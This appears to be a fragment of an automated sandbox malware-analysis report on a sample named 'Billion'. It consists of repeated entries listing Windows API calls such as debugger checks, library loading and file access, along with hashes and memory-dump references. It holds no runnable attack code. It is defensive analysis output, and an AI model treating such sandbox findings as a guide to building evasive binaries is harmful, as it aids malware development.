                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 570149326066609AC72462B8BC4AB7E7B8A5B91734F29031AFD148B2D3DF30CDE14191
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,001697BA,FF8BC369,00000000,00000002,00000000), ref: 00169744
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,001697BA,FF8BC369,00000000,00000002,00000000,?,00165ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00156F41), ref: 0016974E
                                                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00169755
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: fe5a18b76ccadfe396f5532247ef58365967d0ef2240153c06a21f3e5fc808df
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1823da1f7d1b51622402cd835e3369e789037d68966e074891c37e43322f5b47
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe5a18b76ccadfe396f5532247ef58365967d0ef2240153c06a21f3e5fc808df
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92014C32620514ABCB059F99EC06C6E7B2EEB85330B240219F8118B190EB30DD618F90
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0013CEEE
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                          • String ID: `
                                                                                                                                                                                                                                                                                                          • API String ID: 1385522511-609909085
                                                                                                                                                                                                                                                                                                          • Opcode ID: 92a80f791682eeef1ef70b799242c2c778e868bc2750e32f31eebcdf315f98c7
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3ea7566f9655a8c4581bdb6f313a58ba6a05089a7448f0654597dbc5d7601a0b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92a80f791682eeef1ef70b799242c2c778e868bc2750e32f31eebcdf315f98c7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1532D175A00205EFDB24DF58C884ABABBB9FF45350F158069E906AB252C774EE42CFD0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00143006
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                          • String ID: CALL
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
APIs
• GetOpenFileNameW.COMDLG32(?), ref: 0017413B
  • Part of subcall function 00135851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001355D1,?,?,00174B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00135871
  • Part of subcall function 00133A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00133A76
Similarity
• API ID: Name$Path$FileFullLongOpen
• String ID: X
APIs
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00133A3C
Similarity
• API ID: IconNotifyShell_
APIs
• IsThemeActive.UXTHEME ref: 0013333D
  • Part of subcall function 001332E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 001332FB
  • Part of subcall function 001332E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00133312
  • Part of subcall function 0013338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00133368,?), ref: 001333BB
  • Part of subcall function 0013338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00133368,?), ref: 001333CE
  • Part of subcall function 0013338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00202418,00202400,?,?,?,?,?,?,00133368,?), ref: 0013343A
  • Part of subcall function 0013338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00202418,?,?,?,?,?,?,?,00133368,?), ref: 001334BB
• SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00133377
Similarity
• API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM ref: 0014F96C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013EE30: GetInputState.USER32 ref: 0013EF07
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 0018FB22
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InputSleepStateTimetime
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4149333218-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 721ee1e4c0a05618731e76375e4556e9cd85e841e8dfa32be1caa30037c2a52a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 995cc47ac445d417da84e7716079d7898d4080a861c0455606f25416a372401d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 721ee1e4c0a05618731e76375e4556e9cd85e841e8dfa32be1caa30037c2a52a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85F058322003069FC314AF69D415F66FBE9AB54765F024039F81AC73A0DB70A800CB90
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LoadString
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c94ec6b198d97bdc12ac1825d52d093868f44cec60b8cd6a91d3fc32d4f4b9a7
                                                                                                                                                                                                                                                                                                          • Instruction ID: b078a44b88a7efbce28e0fb156f04cbb6b2809c2abc5efd76dd817b1c4337d3f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c94ec6b198d97bdc12ac1825d52d093868f44cec60b8cd6a91d3fc32d4f4b9a7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7D13B75A0420AEFCF14EF98D8819EDBBB5FF58310F144159E915AB291EB30AE81CF90
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: dce337649d865451b65f78f12b8ad9564c043c06a86b29e4facf2ce2657d9c74
                                                                                                                                                                                                                                                                                                          • Instruction ID: aa81c509ba9add9715d6316fb393ecddef2a71610f3cf2a5047a4826e3c2478f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dce337649d865451b65f78f12b8ad9564c043c06a86b29e4facf2ce2657d9c74
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8251C675A00208EFDB14DF68C844AA97BE2EB85365F19816CEC299F392D731ED47CB50
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 0019FCCE
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: b2fffb17f1b570285f0edf5b28d4d9c8a75d3f90e8f3c948983948c7765ecdd1
                                                                                                                                                                                                                                                                                                          • Instruction ID: 59a8fc6b6f03a5ca27eb314ccaf86d2ff51c30df955e375f4b7895b650ce230e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2fffb17f1b570285f0edf5b28d4d9c8a75d3f90e8f3c948983948c7765ecdd1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB419376500209AFCF15DFA8C8819AEB7F8EF58314B21853EE916DB251EB70DE06CB50
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0013668B,?,?,001362FA,?,00000001,?,?,00000000), ref: 0013664A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0013665C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013663E: FreeLibrary.KERNEL32(00000000,?,?,0013668B,?,?,001362FA,?,00000001,?,?,00000000), ref: 0013666E
                                                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,001362FA,?,00000001,?,?,00000000), ref: 001366AB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00136607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00175657,?,?,001362FA,?,00000001,?,?,00000000), ref: 00136610
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00136607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00136622
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00136607: FreeLibrary.KERNEL32(00000000,?,?,00175657,?,?,001362FA,?,00000001,?,?,00000000), ref: 00136635
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ca4e66afdcf9f42fa7715beb77d5c94990faa801624bd3f690f0495ac9bed08e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2c23ba70ce87d19f80b7a685a19a447caf391646718a23e0531c557de1a09f0a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca4e66afdcf9f42fa7715beb77d5c94990faa801624bd3f690f0495ac9bed08e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6711E7B1600305BACF14AB20CD07BADBBA59F60755F20C42DF456AA1C2DFB1DA059B50
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3b6c040ed3dd9c8744854002ee33e92ddb27f03fcc8c7e5abd28e0e5d14c732e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2ebb3d3d0311e4749c0261623384b8e09ab76e66d22a5d6e9df9556a467d9510
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b6c040ed3dd9c8744854002ee33e92ddb27f03fcc8c7e5abd28e0e5d14c732e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9611187590420AAFCB15DF98E94599A7BF8EF48310F114169F809AB311DB31EE21CB65
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00164FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0016319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00165031
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 001653DF
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 614378929-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 97f57b9e0be4db311a63f3fdf227c41e1551cb87f9ff9d800c955b245aceba3d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9701F9736007056BE3318F69DC8195AFBEDFB85370F65061DE59483280EB70A905C774
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 31c1a439cddd47d98a8f0e12b7ba8f377c2423b5a10fd66589acfd294ac55607
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BF02D32901A10D6D7353A6ADC0575A33D98F5233AF110716FC35DB1D1DF70D91A86D2
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 176396367-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 604ebb882747aa44eaa7c4f2dad2a36e43ae16ac027461114254cb873ac85486
                                                                                                                                                                                                                                                                                                          • Instruction ID: 107411009f4df2eb8b4b635992a2aa2c0f35938fe703d6585aa8baa03ec4dfa5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 604ebb882747aa44eaa7c4f2dad2a36e43ae16ac027461114254cb873ac85486
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9F0C8B3601B14BED7159F38D846B66BB98EB54360F10812AFA29CF1D1EB31E5148BA0
APIs
• GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 001AF987
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: EnvironmentVariable
• String ID:
• API String ID: 1431749950-0
APIs
• RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0016319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00165031
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• RtlAllocateHeap.NTDLL(00000000,?,?,?,00156A79,?,0000015D,?,?,?,?,001585B0,000000FF,00000000,?,?), ref: 00163BC5
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                                          • Instruction ID: e00fecff38c3ab8b819b39a2ff64dfccf980f6f2eb9d5c9ad734c48b1fa1532a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42F0F87550020DFFDF09DF90C941E9E7BB9FB18318F208485F9159A151C376EB21ABA1
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00133963
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 752a0917d8ffdf2cb6fc07e876a6feb0ddefb1e228ecb3ea8e501149ec89e6ab
                                                                                                                                                                                                                                                                                                          • Instruction ID: f2858f50469a1c2b6c7fa43360f615f9419dafa2768939b31226fe94dd5d9515
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 752a0917d8ffdf2cb6fc07e876a6feb0ddefb1e228ecb3ea8e501149ec89e6ab
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DEF03771914314DFE7529F24EC4D7957BBCA70170CF0040E6A64496182D774578CCF51
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00133A76
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 541455249-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9d0f504042a36341ddc769c048de98585652df8a8fb19b2b8f91bc3acd297011
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2dd35f059acc50d520486fc4859bfa56736644af1c5cdfdf958101957f20210e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d0f504042a36341ddc769c048de98585652df8a8fb19b2b8f91bc3acd297011
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBE0C272A002245BCB20A358AC06FEA77EDDFC87A0F0440B1FC09D7258DA70EDC08690
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,00000000,?,00170A84,?,?,00000000,?,00170A84,00000000,0000000C), ref: 00170737
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 823142352-0
